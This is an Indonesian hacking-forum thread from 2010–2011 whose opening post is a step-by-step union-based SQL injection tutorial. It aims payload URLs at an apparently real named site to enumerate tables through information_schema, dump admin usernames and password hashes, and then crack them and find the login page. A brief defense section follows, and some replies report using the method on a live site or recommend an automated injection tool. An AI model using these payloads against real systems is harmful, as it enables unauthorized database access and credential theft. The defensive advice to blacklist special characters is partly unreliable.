Username Password

Register Here || Lost Password
View Thread
Explore Your Brain » All About Security I.T » Black & White Proof of Concept
SQL injection [Attack + Defense]
Username
Password
Register FAQ Members List Today's Posts Search

Print Thread

23-02-2010 01:24 AM SQL injection [Attack + Defense] | Edited by ysufv 23-02-2010 09:11 PM
User Avatar

ysufv
Murid Akademi I


Posts: 13
Joined: 23.02.10

Deprecated: Function eregi() is deprecated in /home/explnorg/public_html/includes/bbcodes/code_bbcode_include.php on line 24

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /home/explnorg/public_html/includes/bbcodes/code_bbcode_include.php on line 29

Deprecated: Function eregi() is deprecated in /home/explnorg/public_html/includes/bbcodes/code_bbcode_include.php on line 24

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /home/explnorg/public_html/includes/bbcodes/code_bbcode_include.php on line 29

Deprecated: Function eregi() is deprecated in /home/explnorg/public_html/includes/bbcodes/code_bbcode_include.php on line 24

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /home/explnorg/public_html/includes/bbcodes/code_bbcode_include.php on line 29

Deprecated: Function eregi() is deprecated in /home/explnorg/public_html/includes/bbcodes/code_bbcode_include.php on line 24

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /home/explnorg/public_html/includes/bbcodes/code_bbcode_include.php on line 29

Deprecated: Function eregi() is deprecated in /home/explnorg/public_html/includes/bbcodes/code_bbcode_include.php on line 24

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /home/explnorg/public_html/includes/bbcodes/code_bbcode_include.php on line 29
[+] SQL injection
SQL injection merupakan teknik mengeksploitasi pada kelemahan suatu script yang dapat memaparkan data data yang tersimpan dalam sebuah database, misalnya dalam table user yang menampung data useradmin beserta passwordnya.
[-] Bagaimana cara melakukan teknik SQL injection ini?
Teknik ini didapat melalui mengecek kesalahan parsing php yang memungkinkan terjadinya sebuah vuln, sebagai contoh

Download source  Code
<?php
     $id = $_GET['id'];
          $result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
               >





Kita lihat bahwa variable “id” tidak terfilter, dengan begitu memungkinkan seorang Attacker untuk memasukkan special character pada jumlah id sehingga Attacker dapat mengetahui suatu web yg mempunyai vuln pada SQL injection dengan cara memberi special character pada akhir id, misalnya id=1’ akan memunculkan pesan error (null) Unclosed quotation mark before the character string '1' ' dan sejenisnya,
dengan begitu kita dapat mengeksploitasi melalui id dengan cara menginjeksi satu persatu untuk mencari tahu jumlah table, nama coloumn, nama table, dan bahkan informasi data admin.
Ex:http://smagocyber.co.cc/blog/view.php?id=null+union+all+select+1,2,3,concat(user,0x3a ,password),5,6,7,8,9,10+from+users—
Dan akan muncul username dan passwordnya (biasanya dalam bentuk md5)

[-] Berikut step by step metode sql injection
Cek vulnerability dengan single quote :
http://smagocyber.co.cc/blog/view.php?id=100
setelah itu, kita mencari Halaman apa yang memiliki vuln
http://smagocyber.co.cc/blog/view.php?id=100 order by 1-- > normal
http://smagocyber.co.cc/blog/view.php?id=100 order by 2-- > normal
http://smagocyber.co.cc/blog/view.php?id=100 order by 3-- > normal
http://smagocyber.co.cc/blog/view.php?id=100 order by 4-- > normal
http://smagocyber.co.cc/blog/view.php?id=100 order by 5-- > normal
http://smagocyber.co.cc/blog/view.php?id=100 order by 6-- > normal
http://smagocyber.co.cc/blog/view.php?id=100 order by 7-- > normal
http://smagocyber.co.cc/blog/view.php?id=100 order by 8-- > normal
http://smagocyber.co.cc/blog/view.php?id=100 order by 9-- > error (You have an error in your SQL syntax) ok, kita tahu bahwa target mempunya 8 table.
sekarang kita cari angka table yg muncul untuk kita injeksi pada selanjutnya
dg perintah union select
http://smagocyber.co.cc/blog/view.php?id=100+union+select+1,2,3,4,5,6,7,8—
Ok, misalkan yg keluar angka 5, berarti kita nanti akan menginjeksi pada table angka 5.
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada angka yg keluar tadi
Ex: http://smagocyber.co.cc/blog/view.php?id=100+union+select+1,2,3,4,version(),6,7,8-- atau http://smagocyber.co.cc/blog/view.php?id=100+union+select+1,2,3,4,@@version,6,7,8--
Apabila versi 4, kita tinggalkan saja, karena versi 4 ini kita harus menebak sendiri table & column yg ada pada target tersebut karena tidak bisa menggunakan perintah from+information_schema.. Namun masih terdapat metode SQL injection lain yang lebih rumit untuk versi 4.
Baik, kita misalkan target menggunakan versi 5.
untuk menampilkan table yg ada pada target kita gunakan perintah

Download source  Code
table_name       --> nomor table yg akan di inject tadi (angka5)
+from+information_schema.tables --> dimasukan setelah angka terakhir




Ex: http://smagocyber.co.cc/blog/view.php?id=100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
Misal table yang muncul adalah "admin"
Selanjutnya, gunakan perintah

Download source  Code
group_concat(column_name)    >>> dimasukan pada angka yg keluar tadi
+from+information_schema.columns+where+table_name=0xhexa—
>>> dimasukan setelah angka terakhir





http://smagocyber.co.cc/blog/view.php?id=100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa—
Convert nama table (admin) ke dalam hex, kamu bisa menggunakan hex converter di http://systems-gabirel.isgreat.org
Misal admin maka akan menjadi 61646D696E
http://smagocyber.co.cc/blog/view.php?id=100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E—
Selanjutnya, kita keluarkan isi table yaitu dengan command

Download source  Code
concat_ws(0x3a,hasil isi column yg mau dikeluarkan)    >>> dimasukan pada angka yg keluar tadi
+from+(nama table berasal)      >>> dimasukan setelah angka terakhir




http://smagocyber.co.cc/blog/view.php?id=100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)—
contoh kata yang keluar adalah id,username,password
http://smagocyber.co.cc/blog/view.php?id=100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin—
Selanjutnya kita tinggal mendecrypt password hash (biasanya dalam bentuk md5) dan mencari halaman login
[-] Bagaimana cara mencegah terjadinya SQL injection?
Kita dapat mencegah terjadinya teknik SQL injection ini dengan cara mendisable special character seperti [ - , . ( ) ' " _ + / * ] agar tidak memunculkan pesan error (null), edit bagian file yang mempunyai vuln dengan cara memberi keterangan bahwa hanya memunculkan id=(integer)
Yaitu pada bagian
Download source  Code
$id = $_GET['id']; diganti dengan $id=(int)$_GET['id'];



NB: Biasanya pada sebuah cms seperti joomla mempunyai jumlah table dan coloumn yang sama, sehingga terciptalah sebuah exploit. Exploit tersebut dapat dibedakan melalui component/widget yang dipakai, dan versi dari component/widget tersebut sehingga akan mempunyai vuln yg sama.
 
Offline
23-02-2010 03:59 AM RE: SQL injection [Attack + Defense]
User Avatar

ayam-kalkun
Anbu


Posts: 381
Joined: 20.05.09
Location: /etc/ExploreYourBrain
Age: 26
good tutorial bro ... keep exploreyourbrain.. lagi gw pelajarin tutorialnya ....
Barangsiapa mengajarkan ilmu, maka baginya pahala seperti orang yang mengamalkan ilmu nya dan tidak akan mengurangi pahala orang yang melakukan amal tersebut.
 
Offline
24-02-2010 06:52 AM RE: SQL injection [Attack + Defense]
User Avatar

EVA-00
HackAge


Posts: 2770
Joined: 21.05.08
Location: Wallahu a'lam
Age: 33
Yiha nice share bro. kl mau tutorial komplit yang bisa experiment di komputer sendiri silahkan download ebook "SQL Injection Exposed" di ebook tersebut sudah di sertakan CMS Sederhana yang bisa di inject.

jadi bisa langsung praktek di komputer lu langsung. (heheheh promosi mode on Pfft )
Nabi Muhammad SAW bersabda :” Barangsiapa Yang Mengamalkan Ilmu Yang Ia Ketahui Maka Allah Akan Memberikan Kepadanya Ilmu Yang Belum Ia Ketahui” (HR. Imam Ahmad).

..::shn6 u!vJq Jnoh 3Joldx3 d33>I::..
 
Offline
28-02-2010 12:48 AM RE: SQL injection [Attack + Defense]
User Avatar

ysufv
Murid Akademi I


Posts: 13
Joined: 23.02.10
cihuy, thanks buat tambahannya mas Grin ikutan belajar ah..Cayoooo
 
Offline
01-02-2011 03:48 PM RE: SQL injection [Attack + Defense] | Edited by mvmt4z 01-02-2011 03:48 PM
User Avatar

mvmt4z
Chunnin


Posts: 99
Joined: 23.10.10
Location: Still on planet Earth
@EVA-00 ...... heheh iya nih gara2 penasaran dgn ebook SQL Injection jadinya nyobain juga sambil sekalian belajar .... pas di coba di dunia nyata ( aka dunia maya ) Mad .... dapet pass admin nyah yg pk enkripsi ..... hahhha
 
Offline
18-03-2011 03:36 AM RE: SQL injection [Attack + Defense]
User Avatar

davi jones
Murid Akademi I


Posts: 4
Joined: 18.03.11
nice info gan Goodjob
 
Offline
10-04-2011 03:25 AM RE: SQL injection [Attack + Defense]
User Avatar

civo
Murid Akademi I


Posts: 2
Joined: 10.04.11
bookmark dulu masbro...ijin buat belajarGoodjob
 
Offline
11-05-2011 05:06 AM RE: SQL injection [Attack + Defense]
User Avatar

yukik4ze
Murid Akademi I


Posts: 2
Joined: 22.03.10
Yg pke tools jg bisa.. tapi ga da serunya.. (kecuali kalau benar-benar 'segera'Wink.. bisa search lokal di indo***ster.com, namanya Havij Pro. Sekarang dah yang versi 1.14
 
Offline
Jump to Forum:
Forum powered by fusionBoard
Share this Thread
URL:
BBcode:
HTML:
Similar Threads
Thread Forum Replies Last Post
Man Overboard-Heart Attack (2013) MP3 Album 1 06-06-2013 17:19
Attack Attack!-No Defeat (New Single 2012) MP3 Album 2 23-12-2012 05:20
Attack Attack!-The Motivation Video 1 29-03-2012 01:26
Attack Attack!-This Means War (2012) MP3 Album 7 25-01-2012 03:27
Attack Attack!-The Wretched Video 1 14-01-2012 16:18
Copyright © 2007-2016